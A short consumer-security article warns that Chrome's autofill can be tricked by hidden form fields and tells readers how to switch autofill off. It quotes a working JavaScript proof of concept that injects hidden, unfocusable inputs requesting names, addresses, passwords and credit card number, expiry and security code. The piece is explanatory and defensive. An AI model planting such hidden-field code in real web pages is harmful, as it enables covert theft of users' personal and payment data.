Chrome has yet to fix a well-known vulnerability first publicized way back in 2013.

Basically, a hacker can hide form input fields on a web page, which Chrome will then fill in with your personal information if you opt to use its autocomplete feature.

Here’s what this looks like:

gif by anttiviljami

GitHub user haampie demonstrated this with the following JavaScript script:

var autocompletes = ['name', 'honorific-prefix', 'given-name',  'additional-name', 'family-name', 'honorific-suffix',  'nickname', 'username', 'new-password',  'current-password', 'organization-title', 'organization',  'street-address', 'address-line1', 'address-line2',  'address-line3', 'address-level4', 'address-level3',  'address-level2', 'address-level1', 'country',  'country-name', 'postal-code', 'cc-name', 'cc-given-name',  'cc-additional-name', 'cc-family-name', 'cc-exp',  'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type',  'transaction-currency', 'transaction-amount',  'language', 'bday', 'bday-day', 'bday-month',  'bday-year', 'sex', 'url', 'photo', 'tel',  'tel-country-code', 'tel-national',  'tel-area-code', 'tel-local', 'tel-local-prefix',  'tel-local-suffix', 'tel-extension', 'impp'];emailField.addEventListener('focus', function() {  var wrap = autocompletes.reduce(function(wrapper, field) {    var input = document.createElement('input');        // Make them not focussable    input.tabIndex = -1;    input.autocomplete = field;        wrapper.appendChild(input);    return wrapper;  }, document.createElement('div'));  // Hide the wrapper  wrap.classList.add('hidden');  form.appendChild(wrap);  // Inject the autocompletes once  this.removeEventListener('focus', arguments.callee);});

I recommend you turn off Chrome’s autocomplete feature immediately.

The fastest way to turn off autocomplete in Chrome

  1. Paste this into Chrome’s address bar: chrome://settings/autofill
  2. Press escape to exit the “manage autofill settings” modal
  3. Uncheck the autofill checkbox

Now you’re good to go. You may have to type a bit more, but you can have the peace of mind that hackers won’t be able to steal your personal data using this well-known exploit.